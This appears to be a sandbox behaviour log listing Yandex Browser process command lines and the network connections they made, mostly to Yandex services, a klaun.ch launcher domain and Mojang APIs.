"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5164,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5360,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5368 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=4936,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5436 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5420,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5440 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5520,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5540 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5524,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5548 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5368,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5488 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5464,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5408 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5500,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5440 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5836,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5840 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5784,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5848 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5828,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=6024 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=5820,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5936 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=6036,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5892 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Распаковщик файлов" --field-trial-handle=5336,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=5516 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --broupdater --broupdater-origin=auto --bits_job_guid={53FD9F1A-B5B5-4642-B009-2AC33990B934}

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" --url=https://crash-reports.browser.yandex.net/submit --annotation=install_date=1719179816 --annotation=last_update_date=1719179816 --annotation=launches_after_update=1 --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=1572 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=micromode=broupdater --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf8,0xfc,0x100,0xcc,0x104,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=1808,i,13501747830820339287,12889975122532335750,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1804 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=1936,i,13501747830820339287,12889975122532335750,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1952 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --broupdater-stat-bits --broupdater-stat-name=install --bits_job_guid={95A52657-79CE-4F32-ADBA-05B2F0438A7F}

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" --url=https://crash-reports.browser.yandex.net/submit --annotation=install_date=1719179816 --annotation=last_update_date=1719179816 --annotation=launches_after_update=2 --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=3832 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf8,0xfc,0x100,0xcc,0x104,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=1792,i,6075720620835992658,10196605529921995734,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1784 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=1920,i,6075720620835992658,10196605529921995734,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1936 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=3076,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3100 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Утилиты Windows" --field-trial-handle=3060,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3156 --brver=24.6.0.1878 /prefetch:8

Network

US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 104.26.11.58:443 cf.klaun.ch tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 213.180.193.14:80 clck.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 download.cdn.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.net tcp
RU 5.45.205.243:443 download.cdn.yandex.net tcp
US 8.8.8.8:53 fabric.klaun.ch udp
US 104.26.10.58:443 fabric.klaun.ch tcp
NL 5.45.247.52:443 cachev2-ams02.cdn.yandex.net tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 104.26.10.58:80 fabric.klaun.ch tcp
US 104.26.10.58:443 fabric.klaun.ch tcp
US 8.8.8.8:53 quilt.klaun.ch udp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
RU 5.45.205.243:443 download.cdn.yandex.net tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
NL 5.45.247.51:443 cachev2-ams01.cdn.yandex.net tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:443 quilt.klaun.ch tcp
US 104.26.10.58:80 quilt.klaun.ch tcp
US 104.26.10.58:80 quilt.klaun.ch tcp
US 104.26.10.58:80 quilt.klaun.ch tcp
US 8.8.8.8:53 api.mojang.com udp
US 13.107.246.64:443 api.mojang.com tcp
US 13.107.246.64:443 api.mojang.com tcp
US 13.107.246.64:443 api.mojang.com tcp
US 13.107.246.64:443 api.mojang.com tcp
US 8.8.8.8:53 sessionserver.mojang.com udp
US 13.107.246.64:443 sessionserver.mojang.com tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.net tcp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 sba.yandex.net udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 update.googleapis.com udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
RU 93.158.134.232:443 sba.yandex.net tcp
GB 216.58.204.67:443 update.googleapis.com tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 sovetnik.market.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
US 8.8.8.8:53 browser.yandex.ru udp
RU 87.250.250.41:443 sovetnik.market.yandex.ru tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 api.browser.yandex.net udp
US 8.8.8.8:53 api.browser.yandex.net udp
RU 213.180.193.234:443 api.browser.yandex.net tcp
US 8.8.8.8:53 storage.ape.yandex.net udp
US 8.8.8.8:53 storage.ape.yandex.net udp
RU 93.158.134.232:443 sba.yandex.net tcp
RU 213.180.193.234:443 api.browser.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
RU 87.250.251.66:443 storage.ape.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
US 8.8.8.8:53 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net udp
RU 37.9.64.225:443 cdnrepfu6rku5qba3zpu.svc.cdn.yandex.net tcp
RU 93.158.134.121:443 browser.yandex.ru tcp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 browser-resources.s3.yandex.net udp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 yastatic.net udp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 93.158.134.158:443 browser-resources.s3.yandex.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
RU 178.154.131.217:443 yastatic.net tcp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 webntp.yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
US 8.8.8.8:53 yandex.ru udp
RU 213.180.204.196:443 webntp.yandex.ru tcp
RU 5.255.255.77:443 yandex.ru tcp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:53 mc.yandex.ru udp
US 8.8.8.8:53 mc.yandex.ru udp
RU 87.250.250.119:443 mc.yandex.ru tcp
US 8.8.8.8:53 yastatic.net udp
US 8.8.8.8:53 yastatic.net udp
RU 178.154.131.215:443 yastatic.net tcp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 uid.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 sso.passport.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
US 8.8.8.8:53 api.browser.yandex.ru udp
RU 87.250.254.216:443 uid.yandex.ru tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 mc.yandex.com udp
US 8.8.8.8:53 sso.dzen.ru udp
US 8.8.8.8:53 sso.dzen.ru udp
US 8.8.8.8:53 sso.ya.ru udp
US 8.8.8.8:53 sso.ya.ru udp
RU 62.217.160.14:443 sso.dzen.ru tcp
RU 93.158.134.144:443 sso.ya.ru tcp
RU 213.180.193.234:443 api.browser.yandex.ru tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
US 8.8.4.4:443 dns.google tcp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:443 dns.google udp
N/A 224.0.0.251:5353 - udp
RU 213.180.204.158:443 - tcp
RU 213.180.204.158:443 - tcp
RU 213.180.204.158:443 - tcp
RU 213.180.204.158:443 - tcp
